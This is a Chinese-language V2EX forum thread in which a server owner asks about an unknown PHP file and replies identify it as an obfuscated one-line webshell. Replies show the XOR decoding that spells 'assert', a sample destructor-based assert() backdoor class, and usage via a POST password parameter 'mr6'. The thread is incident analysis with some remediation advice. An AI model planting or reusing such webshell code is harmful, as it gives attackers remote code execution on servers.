服务器莫名其妙多了个文件,帮我看一下这个 PHP 文件的代码有什么用?

2019 年 10 月 30 日
 frozenway

不知道写的是什么,感觉这代码也写得太烂了,一点都不规范啊

8469 次点击
所在节点    PHP
27 条回复
CloudMx
2019 年 10 月 30 日
变形的一句话:
php > echo '?'^"\x5e";
a
php > echo 'y'^"\xa";
s
php > echo '<'^"\x4f";
s
php > echo 'i'^"\xc";
e
php > echo ':'^"\x48";
r
php > echo 't'^"\x0";
t
daxiaolian
2019 年 10 月 30 日
正常开发没人这么写代码,所以服务器上看到乱七八糟的代码都是被黑了。
ShangAliyun
2019 年 10 月 30 日
不知道是不是一句话木马类的东西,用来检测网站是否有能注入文件的漏洞的
tomychen
2019 年 10 月 30 日
变形免杀 webshell
兄弟,你的机器被 shell 了
shench
2019 年 10 月 30 日
这显然是木马啊!
luckyrayyy
2019 年 10 月 30 日
谁能给解释下啥意思..
GG668v26Fd55CP5W
2019 年 10 月 30 日
这就是木马
golden0125
2019 年 10 月 30 日
恭喜你,中马了
Dogergo
2019 年 10 月 30 日
是个木马

```php
class EPLF
{

function __destruct()
{
return @assert("$this->RU");
}
}
$a = new EPLF();
@$a->RU = mkdir('/d/shellattack',0777,true);


```

类似这样,可以通过远程请求该文件执行一些非法操作,执行的操作通过 post/get 提交的变量来处理。
sauren
2019 年 10 月 30 日
一个 php 一句话木马。mr6 是密码。存在 id 参数时 base64 解密,不存在 id 时直接执行。usage:POST mr6=phpinfo() 将会执行 phpinfo。
ahsjs
2019 年 10 月 30 日
析构方法过狗么。
eason1874
2019 年 10 月 30 日
assert,效果类似 eval。就是在析构的时候把 RU 变量作为代码字符串传给 assert 执行。
laoyur
2019 年 10 月 30 日
莫名喜感
JingNi
2019 年 10 月 30 日
构造函数的字符串连接,是专门绕过 waf 的一句话木马,直接能读写你网站根目录的文件,建议楼主备份数据库,检查网站访问日志还有运行环境,找可疑的访问用户。再审计上线原源码的图片上传点还有其他文件包含点吧。
Mithril
2019 年 10 月 30 日
被黑了居然还嫌人代码不规范
被抢了嫌劫匪不够帅?
locoz
2019 年 10 月 30 日
@Mithril #15 哈哈哈哈哈哈哈哈哈哈哈哈哈太精辟了
leadfast
2019 年 10 月 30 日
通常我会觉得这写的太牛批了,狗头保命
wzhndd2
2019 年 10 月 30 日
我也遇到过这种情况,但我是个懒人,我如何能避免自己的服务器免于这种情况呢
frozenway
2019 年 10 月 30 日
@wzhndd2 同问
sunziren
2019 年 10 月 30 日
@wzhndd2 拔网线

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/614324

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX